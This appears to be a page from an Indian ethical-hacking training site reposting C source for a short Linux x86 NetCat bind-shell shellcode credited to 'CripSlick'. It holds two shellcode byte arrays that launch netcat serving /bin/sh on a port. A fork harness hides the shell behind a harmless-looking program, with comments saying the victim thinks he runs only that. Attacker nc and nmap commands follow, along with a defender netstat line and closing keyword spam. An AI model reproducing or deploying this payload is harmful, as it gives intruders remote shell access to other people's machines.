Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan
Credits: CripSlick
#include <stdio.h>#include <string.h>#include <unistd.h> //| needed for C "fork"#include <stdlib.h> //| needed for C "system" //|=====================================================================================================//|================================ CripSlick's Short NetCat Bind Shell ================================//|//|//| Why use CripSlick's NetCat Bind Shell?//| Because it is short and that is about the only reason. If you can spare some bytes, I highly //| suggest that you go with my Ncat Bind Shell that has the added benefits of SSL, persistent,//| multi-terminal with a password //| //|//| Sometimes we don't have the luxury of being able to have the other goodies so you must make do //| with a less powerful approach to at least get your foot in the door, and that is why I made this.//| //| Defender Bash Script //| netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"//|//| I came up with this bash script because I wanted to be able to see who was spying that included//| TCP listening, TCP established, UDP listening, & UDP established.//| I found it annoying that some people needed to run a new script for every state so I fixed that.//| the "-A 50" means your bash script will hold up to 50 connections.//| If you need more connections increase the number, and if the scan is slow, decrease the number. #define PORT "\x39\x38" // FORWARD BYTE ORDER (ASCII TO HEX)//| PORT:98 //| Specifying the PROTOCOL Only Applies to CODE2//#define PROTOCOL "\x76\x76" // TCP & IS terminal visible#define PROTOCOL "\x75\x75" // UDP & NOT terminal visible //|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================//| ==============================================================================//| CODE1 Random Port, real ghetto but only 44 bytes!!//| ==============================================================================//| Attacker Finds Port: nmap 10.1.1.4 -p-//| Attacker Connects via TCP: nc <IP> <PORT>//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp" unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< "\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d""\x6c\x76\x76\x89\xe6\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89""\xe3\x50\x56\x53\x89\xe1\xb0\x0b\xcd\x80"; //|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================//| ==============================================================================//| CODE2 with port and still only 52 bytes//| ==============================================================================//| Attacker Connects via TCP: nc <IP> <PORT>//| Attacker Connects via UDP: nc -u <IP> <PORT>//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp" unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< "\x31\xdb\xf7\xe3\x68\x2d\x70"PORT"\x89\xe7\x50\x68\x6e\x2f\x73\x68\x68""\x65\x2f\x62\x69\x68\x2d\x6c"PROTOCOL"\x89\xe6\x50\x68\x2f\x2f\x6e\x63""\x68\x2f\x62\x69\x6e\x89\xe3\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80"; //|========================== VOID SHELLCODE ======================================void SHELLCODE(){// This part floods the registers to make sure the shellcode will always run __asm__("mov $0xAAAAAAAA, %eax\n\t" "mov %eax, %ebx\n\t" "mov %eax, %ecx\n\t" "mov %eax, %edx\n\t" "mov %eax, %esi\n\t" "mov %eax, %edi\n\t" "mov %eax, %ebp\n\t" "call CODE2"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>} //|========================== VOID printBytes =====================================void printBytes(){printf("CripSlick's code is %d Bytes Long\n", strlen(CODE2)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>} //|============================== Int main ========================================int main (){ // IMPORTANT> replace CODEX the "unsigned char" variable above// > This needs to be done twice (for string count + code to use) int pid = fork(); // fork start if(pid == 0){ // pid always starts at 0 SHELLCODE(); // launch void SHELLCODE // this is to represent a scenario where you bind to a good program // you always want your shellcode to run first }else if(pid > 0){ // pid will always be greater than 0 after the 1st process // this argument will always be satisfied printBytes(); // launch printBYTES // pretend that this is the one the victim thinks he is only using }return 0; // satisfy int mainsystem("exit"); // keeps our shellcode a daemon. This only works with C0DE2 as UDP}www.extremehacking.org
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training Institute, CEHv9,CHFI,ECSAv9,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India
Sadik Shaikh | Cyber Suraksha Abhiyan, Ethical Hacking Training Institute, CEHv9,CHFI,ECSAv9,CAST,ENSA, CCNA, CCNA SECURITY,MCITP,RHCE,CHECKPOINT, ASA FIREWALL,VMWARE,CLOUD,ANDROID,IPHONE,NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India